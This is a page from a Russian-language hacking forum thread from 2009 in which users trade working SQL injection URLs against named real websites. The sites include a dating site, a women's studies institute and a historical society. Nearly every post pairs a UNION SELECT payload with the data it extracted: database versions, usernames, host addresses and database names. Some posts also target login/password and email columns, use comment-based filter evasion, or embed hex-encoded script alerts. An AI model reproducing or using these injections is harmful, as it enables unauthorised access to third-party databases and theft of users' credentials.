ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10661  
Старый 10.09.2009, 19:20
Аватар для DrAssault
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
_ttp://www.examen.biz/book.php?id=-1859+union+select+1,2,3,database(),5,6,7,8,9,10,ve rsion(),12,user(),14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31+from+user+--+
4.0.27-log
examen@pm1.zenon.net
examen
 
Ответить с цитированием

  #10662  
Старый 10.09.2009, 19:34
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.usaonlinedatingsite.com/p.php?id=-1%20UNION%20SELECT,1,2,3,4,concat_ws%280x3a,login, password%29,6,7,8,9,10,11,12,13,14,15,16,17,18%20F ROM%20usaonli_db1.frm_users%20LIMIT%200,1--


5 версия...
 
Ответить с цитированием

  #10663  
Старый 10.09.2009, 19:56
Аватар для Swift
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Цитата:
http://trudovoy.webworks.ru domin_gallery.php?did=1;select+cast(version()+as+i nt)
PostgreSQL 8.2.3 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20061011 (Red Hat 4.1.1-30)

Последний раз редактировалось Swift; 12.09.2009 в 22:37..
 
Ответить с цитированием

  #10664  
Старый 10.09.2009, 20:15
Аватар для Dyxxx
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

iwsi.org pr3
The International Women's Studies Institute.
Код:
http://www.iwsi.org/pages.cfm?ID=null union all select null,null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null,null,null,null,null,null,null,null,null,null
4.1.20-log/eboneparth@216.119.112.191/iwsicontent
 
Ответить с цитированием

  #10665  
Старый 11.09.2009, 00:30
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://velosport.ru/catalog/?cid=3&id=55+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database())--
w_hbsp@195.42.160.50:4.1.20-1.gms:w_hbsp

ТИЦ: 230




Код:
http://ckpt.ru/newsdetails.html?id=-97+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7--

exportbe_ckpt@v15.valuehost.ru:4.0.27-max-log:exportbe_ckpt

ТИЦ: 20
PR: 4
 
Ответить с цитированием

  #10666  
Старый 11.09.2009, 01:07
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Смог найти префикс, и всё
Код:
http://www.st-art.ru/?go=catalog&cat_id=1+UNION+SELECT+1,concat(newsid,0x3a3a3a,newstext),3,4+from+im_news/*
Ну и стандартный набор
Код:
http://www.st-art.ru/?go=catalog&cat_id=1+UNION+SELECT+1,concat(user(),0x3a3a3a,database(),0x3a3a3a,version()),3,4+from+im_news/*
im_st-art_ru@zvm12.host.ru:::im_st-art_ru:::4.0.27-log
Ну и из кэша гугла путь
/bhome/part1/02/start/st-art.ru/www/main.php

Последний раз редактировалось Ponchik; 11.09.2009 в 01:11..
 
Ответить с цитированием

  #10667  
Старый 11.09.2009, 10:13
Аватар для Dyxxx
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

antrimhistory.net pr4
The Glens of Antrim Historical Society
Код:
http://www.antrimhistory.net/content.php?cid=50+UNION+SELECT+null,null,null,null,null,concat_ws(0x2f,0x3C7363726970743E616C6572742827,version(),user(),database(),0x27293C2F7363726970743E),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+LIMIT+1,1/*
4.1.22-Max/u1001104_goahs@172.16.3.36/db1001104_goahs
 
Ответить с цитированием

  #10668  
Старый 11.09.2009, 16:33
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

www.agidev.com - PR=4
http://www.agidev.com/articles/a.php?id=1/**/and/**/1=7%20/**/uniON/**/seLeCT/**/1,2,3,version(),5/*
version - 5.0.45-log
user - agidev_client@apache2-emu.wolverine.dreamhost.com
database - agidev_site
os - unknown-linux-gnu
http://www.agidev.com/articles/a.php?id=1/**/and/**/1=7%20/**/uniON/**/seLeCT/**/1,2,3,email,5/**/FROM/**/people/**/LIMIT/**/0,1
 
Ответить с цитированием

  #10669  
Старый 11.09.2009, 21:18
Аватар для edichka
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572

Репутация: 34
По умолчанию

pr 3 www.onoci.net

Код HTML:
http://www.onoci.net/virilio/pages_uk/artistes/fiche.php?id=-25%20union%20select%201,version(),3,4,5,6,7,8,9,user(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5&th=2&img=1

http://www.onoci.net/virilio/admin/ - админка

5.0.45-log,onoci@localhost

Pr 3 laitdbac.com

Код HTML:
http://laitdbac.com/fiche.php?id=-10%20union%20select%201,version(),3,4,5,6,7,8,9,0

database,user,version - 
::::dbo201044235@212.227.119.175::::db201044235::::5.0.51a-log

Последний раз редактировалось jokester; 11.09.2009 в 22:48..
 
Ответить с цитированием

  #10670  
Старый 12.09.2009, 02:07
Аватар для cremator (c)
cremator (c)
Постоянный
Регистрация: 20.06.2008
Сообщений: 323
Провел на форуме:
1240829

Репутация: 165
Отправить сообщение для cremator (c) с помощью ICQ
По умолчанию

Код:
http://refoweb.net/getpay.php?id=100043+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
Вывода нет.. Но ветка пятая
Код:
http://refoweb.net/getpay.php?id=100043+and+2=1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13+from+information_schema.tables
Яндекс тИЦ 80
Google PageRank 2

ЗЫ: кидало партнёрка. У самого есть акк там, бабло не выводят естесс-но..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ